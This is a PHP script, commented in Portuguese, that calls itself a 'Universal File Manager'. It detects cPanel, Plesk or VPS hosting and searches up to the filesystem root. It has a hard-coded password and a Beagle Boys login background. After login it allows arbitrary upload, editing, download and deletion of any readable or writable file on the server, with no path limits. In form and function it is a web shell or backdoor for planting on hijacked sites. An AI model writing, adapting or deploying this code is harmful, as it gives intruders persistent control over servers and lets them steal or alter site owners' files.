<?php
session_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Configuração universal para qualquer host/VPS
class UniversalFileManager {
    private $config;
    
    public function __construct() {
        $this->config = $this->detectEnvironment();
    }
    
    private function detectEnvironment() {
        // Detectar automaticamente o ambiente do servidor
        $document_root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();
        $script_dir = dirname(__FILE__);
        
        // Tentar detectar caminhos comuns de hospedagem
        $possible_roots = array(
            $document_root,
            $script_dir,
            '/home',
            '/var/www',
            '/public_html',
            '/htdocs',
            '/www',
            dirname($document_root),
            realpath($document_root . '/..'),
        );
        
        // Detectar se está em shared hosting, VPS ou dedicado
        $hosting_type = $this->detectHostingType();
        
        // Configurar caminhos baseado no tipo de hospedagem
        switch($hosting_type) {
            case 'cpanel':
                $root_path = $this->findCpanelRoot();
                break;
            case 'plesk':
                $root_path = $this->findPleskRoot();
                break;
            case 'vps':
                $root_path = $this->findVpsRoot();
                break;
            default:
                $root_path = $this->findGenericRoot();
        }
        
        return array(
            'username' => 'AFROM4N',
            'password' => '690340',
            'root_path' => $root_path,
            'hosting_type' => $hosting_type,
            'max_file_size' => 50 * 1024 * 1024,
            'allowed_extensions' => array('txt', 'php', 'html', 'css', 'js', 'json', 'xml', 'md', 'log', 'jpg', 'jpeg', 'png', 'gif', 'webp', 'zip'),
        );
    }
    
    private function detectHostingType() {
        // Detectar tipo de hospedagem
        if (file_exists('/usr/local/cpanel')) {
            return 'cpanel';
        }
        if (file_exists('/opt/psa') || file_exists('/usr/local/psa')) {
            return 'plesk';
        }
        $server_software = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '';
        if (strpos($server_software, 'Apache') !== false && is_dir('/etc/apache2')) {
            return 'vps';
        }
        if (strpos($server_software, 'nginx') !== false) {
            return 'vps';
        }
        return 'generic';
    }
    
    private function findCpanelRoot() {
        // Caminhos típicos do cPanel
        $user = get_current_user();
        $paths = array(
            "/home/$user",
            "/home/$user/public_html",
            "/home/$user/domains",
            isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
            dirname(isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd())
        );
        
        foreach ($paths as $path) {
            if (is_dir($path) && is_readable($path)) {
                return realpath($path);
            }
        }
        return getcwd();
    }
    
    private function findPleskRoot() {
        // Caminhos típicos do Plesk
        $paths = array(
            '/var/www/vhosts',
            isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
            dirname(isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd())
        );
        
        foreach ($paths as $path) {
            if (is_dir($path) && is_readable($path)) {
                return realpath($path);
            }
        }
        return getcwd();
    }
    
    private function findVpsRoot() {
        // Caminhos típicos de VPS
        $paths = array(
            '/var/www',
            '/var/www/html',
            '/srv/www',
            '/home',
            isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
            '/'
        );
        
        foreach ($paths as $path) {
            if (is_dir($path) && is_readable($path)) {
                return realpath($path);
            }
        }
        return getcwd();
    }
    
    private function findGenericRoot() {
        // Tentar encontrar o melhor caminho raiz
        $current = getcwd();
        $document_root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $current;
        
        // Subir até encontrar um diretório com permissões adequadas
        $test_path = $current;
        while ($test_path !== '/' && $test_path !== '') {
            if (is_readable($test_path) && is_writable($test_path)) {
                return $test_path;
            }
            $test_path = dirname($test_path);
        }
        
        return $current;
    }
    
    public function getConfig() {
        return $this->config;
    }
}

// Inicializar gerenciador universal
$fileManager = new UniversalFileManager();
$config = $fileManager->getConfig();

// Função de autenticação
function authenticate() {
    global $config;
    if (!isset($_SESSION['authenticated'])) {
        if (isset($_POST['username']) && isset($_POST['password'])) {
            if ($_POST['username'] === $config['username'] && $_POST['password'] === $config['password']) {
                $_SESSION['authenticated'] = true;
                return true;
            }
        }
        return false;
    }
    return true;
}

// Logout
if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

// Verificar autenticação
if (!authenticate()) {
    showLoginForm();
    exit;
}

// Obter diretório atual com detecção automática
$current_dir = isset($_GET['dir']) ? realpath($_GET['dir']) : $config['root_path'];

// Validação de segurança - permitir navegação em todo o sistema acessível
if (!$current_dir || !is_dir($current_dir) || !is_readable($current_dir)) {
    $current_dir = $config['root_path'];
}

// Funções utilitárias
function formatBytes($size, $precision = 2) {
    $units = array('B', 'KB', 'MB', 'GB', 'TB');
    for ($i = 0; $size > 1024 && $i < count($units) - 1; $i++) {
        $size /= 1024;
    }
    return round($size, $precision) . ' ' . $units[$i];
}

function getFileIcon($filename) {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $icons = array(
        'php' => '🐘', 'html' => '🌐', 'css' => '🎨', 'js' => '⚡',
        'txt' => '📄', 'md' => '📝', 'json' => '📋', 'xml' => '📊',
        'jpg' => '🖼️', 'jpeg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'webp' => '🖼️',
        'pdf' => '📕', 'zip' => '📦', 'rar' => '📦', 'mp3' => '🎵', 'mp4' => '🎬'
    );
    return isset($icons[$ext]) ? $icons[$ext] : '📄';
}

// Processar ações
if (isset($_POST['action'])) {
    switch ($_POST['action']) {
        case 'upload':
            if (isset($_FILES['file'])) {
                $target = $current_dir . '/' . basename($_FILES['file']['name']);
                if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
                    $message = "Arquivo enviado com sucesso!";
                } else {
                    $message = "Erro ao enviar arquivo!";
                }
            }
            break;
            
        case 'create_folder':
            if (isset($_POST['folder_name'])) {
                $folder_path = $current_dir . '/' . $_POST['folder_name'];
                if (mkdir($folder_path, 0755)) {
                    $message = "Pasta criada com sucesso!";
                } else {
                    $message = "Erro ao criar pasta!";
                }
            }
            break;
            
        case 'delete':
            if (isset($_POST['file_path'])) {
                $file_path = $_POST['file_path'];
                if (is_file($file_path)) {
                    unlink($file_path);
                    $message = "Arquivo deletado com sucesso!";
                } elseif (is_dir($file_path)) {
                    rmdir($file_path);
                    $message = "Pasta deletada com sucesso!";
                }
            }
            break;
    }
}

// Handle file download
if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file) && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// Handle file editing
if (isset($_GET['edit'])) {
    $edit_file = $_GET['edit'];
    if (isset($_POST['save_content'])) {
        file_put_contents($edit_file, $_POST['file_content']);
        $message = "Arquivo salvo com sucesso!";
    }
}

// Get directory contents
function getDirContents($dir) {
    $contents = array();
    if (is_dir($dir) && is_readable($dir)) {
        $items = @scandir($dir);
        if ($items !== false) {
            foreach ($items as $item) {
                if ($item != '.' && $item != '..') {
                    $path = $dir . '/' . $item;
                    $contents[] = array(
                        'name' => $item,
                        'path' => $path,
                        'is_dir' => is_dir($path),
                        'size' => is_file($path) ? @filesize($path) : 0,
                        'modified' => @filemtime($path),
                        'permissions' => @substr(sprintf('%o', @fileperms($path)), -4),
                        'readable' => is_readable($path),
                        'writable' => is_writable($path)
                    );
                }
            }
        }
    }
    return $contents;
}

$dir_contents = getDirContents($current_dir);

function showLoginForm() {
    ?>
    <!DOCTYPE html>
    <html lang="pt-BR">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Universal File Manager - Login</title>
        <style>
            * { margin: 0; padding: 0; box-sizing: border-box; }
            body {
                font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
                background: linear-gradient(rgba(0,0,0,0.7), rgba(0,0,0,0.7)), 
                           url('https://s2-oglobo.glbimg.com/yPCXFaT9bSuGFVrx7DY1wpYHEOQ=/0x0:575x463/888x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_da025474c0c44edd99332dddb09cabe8/internal_photos/bs/2023/e/9/OoXtBnS5SFZKnBShn0qw/55709957-pa-coluna-do-noblat-os-irmaos-metralha.jpg');
                background-size: cover;
                background-attachment: fixed;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
            }
            .auth-form {
                background: rgba(255,255,255,0.95);
                padding: 40px;
                border-radius: 10px;
                box-shadow: 0 4px 20px rgba(0,0,0,0.5);
                text-align: center;
            }
            .auth-form h2 { margin-bottom: 20px; color: #333; }
            .auth-form input {
                width: 100%;
                padding: 12px;
                margin: 10px 0;
                border: 1px solid #ddd;
                border-radius: 5px;
                font-size: 16px;
            }
            .auth-form button {
                width: 100%;
                padding: 12px;
                background: #007cba;
                color: white;
                border: none;
                border-radius: 5px;
                font-size: 16px;
                cursor: pointer;
            }
            .auth-form button:hover { background: #005a8b; }
        </style>
    </head>
    <body>
        <form method="POST" class="auth-form">
            <h2>🗂️ Universal File Manager</h2>
            <p>Acesso Universal para Qualquer Host</p>
            <input type="text" name="username" placeholder="Usuário" required>
            <input type="password" name="password" placeholder="Senha" required>
            <button type="submit">Entrar</button>
        </form>
    </body>
    </html>
    <?php
    exit;
}
?>

<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Universal File Manager - <?php echo basename($current_dir); ?></title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(rgba(0,0,0,0.3), rgba(0,0,0,0.3)), 
                       url('https://s2-oglobo.glbimg.com/yPCXFaT9bSuGFVrx7DY1wpYHEOQ=/0x0:575x463/888x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_da025474c0c44edd99332dddb09cabe8/internal_photos/bs/2023/e/9/OoXtBnS5SFZKnBShn0qw/55709957-pa-coluna-do-noblat-os-irmaos-metralha.jpg');
            background-size: cover;
            background-attachment: fixed;
            min-height: 100vh;
            color: #333;
        }

        .container {
            max-width: 1400px;
            margin: 0 auto;
            padding: 20px;
            background: rgba(255, 255, 255, 0.95);
            min-height: 100vh;
            box-shadow: 0 0 30px rgba(0,0,0,0.3);
        }

        .header {
            background: #2c3e50;
            color: white;
            padding: 20px;
            border-radius: 8px;
            margin-bottom: 20px;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .header h1 {
            margin-bottom: 5px;
        }

        .server-info {
            background: #34495e;
            padding: 15px;
            border-radius: 5px;
            margin-top: 10px;
            font-size: 14px;
        }

        .server-info div {
            margin-bottom: 5px;
        }

        .breadcrumb {
            background: #ecf0f1;
            padding: 15px;
            border-radius: 5px;
            margin-bottom: 20px;
            border-left: 4px solid #3498db;
        }

        .breadcrumb strong {
            color: #2c3e50;
            margin-right: 10px;
        }

        .path-parts {
            display: flex;
            flex-wrap: wrap;
            align-items: center;
            gap: 5px;
            margin-top: 8px;
        }

        .path-part {
            background: #3498db;
            color: white;
            padding: 4px 8px;
            border-radius: 3px;
            cursor: pointer;
            font-size: 13px;
            transition: background-color 0.3s;
        }

        .path-part:hover {
            background: #2980b9;
        }

        .path-separator {
            color: #7f8c8d;
            margin: 0 2px;
        }

        .actions {
            display: flex;
            gap: 10px;
            margin-bottom: 20px;
            flex-wrap: wrap;
        }

        .btn {
            padding: 10px 15px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            text-decoration: none;
            display: inline-block;
            font-size: 14px;
            transition: all 0.3s;
        }

        .btn-primary { background: #3498db; color: white; }
        .btn-success { background: #27ae60; color: white; }
        .btn-danger { background: #e74c3c; color: white; }
        .btn-warning { background: #f39c12; color: white; }

        .btn:hover { opacity: 0.8; transform: translateY(-1px); }

        .file-list {
            background: white;
            border-radius: 8px;
            overflow: hidden;
            box-shadow: 0 2px 15px rgba(0,0,0,0.1);
        }

        .file-list table {
            width: 100%;
            border-collapse: collapse;
        }

        .file-list th,
        .file-list td {
            padding: 12px;
            text-align: left;
            border-bottom: 1px solid #eee;
        }

        .file-list th {
            background: #f8f9fa;
            font-weight: 600;
            color: #2c3e50;
            position: sticky;
            top: 0;
        }

        .file-list tr:hover {
            background: #f8f9fa;
        }

        .folder-link {
            color: #3498db;
            text-decoration: none;
            font-weight: 500;
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .folder-link:hover {
            text-decoration: underline;
        }

        .file-name {
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .file-actions {
            display: flex;
            gap: 5px;
        }

        .file-actions a {
            padding: 5px 8px;
            font-size: 12px;
            border-radius: 3px;
            text-decoration: none;
        }

        .status-indicator {
            display: inline-block;
            width: 8px;
            height: 8px;
            border-radius: 50%;
            margin-right: 5px;
        }

        .status-readable { background: #27ae60; }
        .status-writable { background: #f39c12; }
        .status-restricted { background: #e74c3c; }

        .modal {
            display: none;
            position: fixed;
            z-index: 1000;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0,0,0,0.5);
        }

        .modal.active { display: flex; justify-content: center; align-items: center; }

        .modal-content {
            background-color: white;
            padding: 25px;
            border-radius: 8px;
            width: 90%;
            max-width: 500px;
        }

        .form-group {
            margin-bottom: 15px;
        }

        .form-group label {
            display: block;
            margin-bottom: 5px;
            font-weight: 500;
        }

        .form-group input,
        .form-group textarea {
            width: 100%;
            padding: 8px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 14px;
        }

        .message {
            padding: 12px;
            margin-bottom: 20px;
            border-radius: 5px;
            background: #d4edda;
            color: #155724;
            border: 1px solid #c3e6cb;
        }

        .editor {
            background: white;
            border-radius: 8px;
            padding: 20px;
            margin-top: 20px;
        }

        .editor textarea {
            width: 100%;
            height: 400px;
            font-family: 'Courier New', monospace;
            font-size: 14px;
            border: 1px solid #ddd;
            border-radius: 4px;
            padding: 10px;
        }

        @media (max-width: 768px) {
            .container { padding: 10px; }
            .actions { flex-direction: column; }
            .file-list table { font-size: 12px; }
            .path-parts { flex-direction: column; align-items: flex-start; }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div>
                <h1>🗂️ Universal File Manager</h1>
                <div class="server-info">
                    <div><strong>🖥️ Tipo de Hospedagem:</strong> <?php echo ucfirst($config['hosting_type']); ?></div>
                    <div><strong>📁 Diretório Raiz:</strong> <?php echo $config['root_path']; ?></div>
                    <div><strong>🌐 Servidor:</strong> <?php echo isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost'; ?></div>
                    <div><strong>👤 Usuário:</strong> <?php echo get_current_user(); ?></div>
                </div>
            </div>
            <a href="?logout=1" class="btn btn-danger">Sair</a>
        </div>

        <?php if (isset($message)): ?>
            <div class="message"><?php echo $message; ?></div>
        <?php endif; ?>

        <div class="breadcrumb">
            <strong>📍 Localização Atual:</strong>
            <div class="path-parts">
                <?php
                // Criar navegação por partes do caminho
                $path_parts = explode('/', $current_dir);
                $cumulative_path = '';
                
                foreach ($path_parts as $i => $part) {
                    if ($part !== '') {
                        $cumulative_path .= '/' . $part;
                        echo '<span class="path-part" onclick="navigateToPath(\'' . htmlspecialchars($cumulative_path) . '\')">' . htmlspecialchars($part) . '</span>';
                        if ($i < count($path_parts) - 1) {
                            echo '<span class="path-separator">/</span>';
                        }
                    }
                }
                ?>
            </div>
            <div style="margin-top: 8px; font-size: 12px; color: #7f8c8d;">
                Caminho completo: <?php echo $current_dir; ?>
            </div>
        </div>

        <div class="actions">
            <button class="btn btn-primary" onclick="openModal('uploadModal')">📤 Enviar Arquivo</button>
            <button class="btn btn-success" onclick="openModal('folderModal')">📁 Nova Pasta</button>
            <?php if (dirname($current_dir) !== $current_dir): ?>
                <a href="?dir=<?php echo urlencode(dirname($current_dir)); ?>" class="btn btn-warning">⬆️ Voltar</a>
            <?php endif; ?>
            <a href="?dir=<?php echo urlencode($config['root_path']); ?>" class="btn btn-primary">🏠 Raiz</a>
        </div>

        <div class="file-list">
            <table>
                <thead>
                    <tr>
                        <th>Status</th>
                        <th>Nome</th>
                        <th>Tamanho</th>
                        <th>Modificado</th>
                        <th>Permissões</th>
                        <th>Ações</th>
                    </tr>
                </thead>
                <tbody>
                    <?php foreach ($dir_contents as $item): ?>
                        <tr>
                            <td>
                                <span class="status-indicator <?php echo $item['readable'] ? ($item['writable'] ? 'status-writable' : 'status-readable') : 'status-restricted'; ?>" 
                                      title="<?php echo $item['readable'] ? ($item['writable'] ? 'Leitura/Escrita' : 'Apenas Leitura') : 'Restrito'; ?>"></span>
                            </td>
                            <td>
                                <?php if ($item['is_dir']): ?>
                                    <a href="?dir=<?php echo urlencode($item['path']); ?>" class="folder-link">
                                        📁 <?php echo htmlspecialchars($item['name']); ?>
                                    </a>
                                <?php else: ?>
                                    <div class="file-name">
                                        <?php echo getFileIcon($item['name']); ?>
                                        <span><?php echo htmlspecialchars($item['name']); ?></span>
                                    </div>
                                <?php endif; ?>
                            </td>
                            <td><?php echo $item['is_dir'] ? '-' : formatBytes($item['size']); ?></td>
                            <td><?php echo $item['modified'] ? date('d/m/Y H:i', $item['modified']) : '-'; ?></td>
                            <td><?php echo isset($item['permissions']) ? $item['permissions'] : '-'; ?></td>
                            <td>
                                <div class="file-actions">
                                    <?php if (!$item['is_dir'] && $item['readable']): ?>
                                        <a href="?download=<?php echo urlencode($item['path']); ?>" class="btn btn-primary">⬇️</a>
                                        <a href="?edit=<?php echo urlencode($item['path']); ?>" class="btn btn-warning">✏️</a>
                                    <?php endif; ?>
                                    <?php if ($item['writable']): ?>
                                        <a href="#" onclick="deleteItem('<?php echo addslashes($item['path']); ?>', '<?php echo addslashes($item['name']); ?>')" class="btn btn-danger">🗑️</a>
                                    <?php endif; ?>
                                </div>
                            </td>
                        </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
        </div>

        <?php if (isset($_GET['edit'])): ?>
            <div class="editor">
                <h3>Editando: <?php echo basename($_GET['edit']); ?></h3>
                <form method="POST">
                    <div class="form-group">
                        <textarea name="file_content"><?php echo htmlspecialchars(file_get_contents($_GET['edit'])); ?></textarea>
                    </div>
                    <button type="submit" name="save_content" class="btn btn-success">💾 Salvar</button>
                    <a href="?dir=<?php echo urlencode($current_dir); ?>" class="btn btn-warning">❌ Cancelar</a>
                </form>
            </div>
        <?php endif; ?>
    </div>

    <!-- Upload Modal -->
    <div id="uploadModal" class="modal">
        <div class="modal-content">
            <h3>Enviar Arquivo</h3>
            <form method="POST" enctype="multipart/form-data">
                <div class="form-group">
                    <label>Selecionar arquivo:</label>
                    <input type="file" name="file" required>
                </div>
                <button type="submit" name="action" value="upload" class="btn btn-success">Enviar</button>
                <button type="button" onclick="closeModal('uploadModal')" class="btn btn-danger">Cancelar</button>
            </form>
        </div>
    </div>

    <!-- Folder Modal -->
    <div id="folderModal" class="modal">
        <div class="modal-content">
            <h3>Criar Nova Pasta</h3>
            <form method="POST">
                <div class="form-group">
                    <label>Nome da pasta:</label>
                    <input type="text" name="folder_name" required>
                </div>
                <button type="submit" name="action" value="create_folder" class="btn btn-success">Criar</button>
                <button type="button" onclick="closeModal('folderModal')" class="btn btn-danger">Cancelar</button>
            </form>
        </div>
    </div>

    <!-- Delete Form -->
    <form id="deleteForm" method="POST" style="display: none;">
        <input type="hidden" name="action" value="delete">
        <input type="hidden" name="file_path" id="deleteFilePath">
    </form>

    <script>
        function navigateToPath(path) {
            window.location.href = '?dir=' + encodeURIComponent(path);
        }

        function openModal(modalId) {
            document.getElementById(modalId).style.display = 'flex';
        }

        function closeModal(modalId) {
            document.getElementById(modalId).style.display = 'none';
        }

        function deleteItem(path, name) {
            if (confirm('Tem certeza que deseja deletar "' + name + '"?')) {
                document.getElementById('deleteFilePath').value = path;
                document.getElementById('deleteForm').submit();
            }
        }

        // Close modal when clicking outside
        window.onclick = function(event) {
            if (event.target.classList.contains('modal')) {
                event.target.style.display = 'none';
            }
        }
    </script>
</body>
</html>